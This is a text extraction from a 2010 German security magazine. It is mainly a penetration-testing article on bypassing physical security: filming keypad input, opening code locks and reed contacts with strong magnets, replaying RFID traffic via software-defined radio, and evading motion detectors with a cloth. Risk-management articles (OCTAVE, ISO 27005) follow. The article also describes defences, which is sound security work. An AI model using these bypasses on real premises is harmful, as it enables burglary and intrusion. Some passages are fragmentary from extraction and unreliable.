Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
